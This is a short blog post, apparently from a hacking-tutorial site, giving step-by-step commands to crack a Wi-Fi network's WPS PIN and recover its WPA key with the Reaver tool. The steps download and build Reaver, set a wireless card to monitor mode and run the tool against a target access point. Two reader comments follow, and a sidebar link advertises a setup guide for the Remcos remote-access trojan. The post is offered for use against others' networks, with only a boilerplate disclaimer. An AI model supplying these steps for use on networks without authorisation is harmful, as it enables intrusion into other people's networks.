How to Crack WPS & WPA of wifi network using Reaver



OS required Linux-backtrack


1. Get the reaver
- wget https://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz
 
2. Extract and compile it.
- tar xzvf reaver-1.3.tar.gz
- cd reaver-1.3/src
- ./configure 
- make
- make install


3. Change your wireless card to monitor mode
- airmon-ng start wlan0


4. Use reaver
- reaver -i mon0 -b <mac_address_wireless_access_point>


5. Waiting beacon from Wireless Access Point and finally you will found the key!!!


Responses

2 Respones to "How to Crack WPS & WPA of wifi network using Reaver"

Unknown said...

Bro i need a video tutorial because i try it alot but i can't find a key


January 23, 2012 at 9:39 AM
Devendra said...

actuallly i dont have any wifi hotspot near my house ..and also i m not going to colg these days so ..u have to w8 fr a video tutorial ok ..!!!


January 24, 2012 at 8:44 PM

Post a Comment

Latest From us

Remcos Rat 2019 [ Setup Guide + Tutorial ]

Instructions

THIS WEBSITE IS BUILT BY ME FOR EDUCATIONAL PURPOSE. IF YOU USE THIS INFORMATION TO HARM ANY SUBSTANCE OR COMMUNITY PERSONALLY AND GOT CAUGHT THAN WE ARE NOT RESPONSIBLE, EXPAND YOUR INFORMATION,SHARE UR THOUGHTS AND KNOWLEDGE WITH US. MAIL ME ON RRRICKY.SAINI2@GMAIL.COM

Contributors

Stay Connected

DMCA.com
Return to top of page Copyright © 2011 | Platinum Theme Converted into Blogger Template by devzcyberarena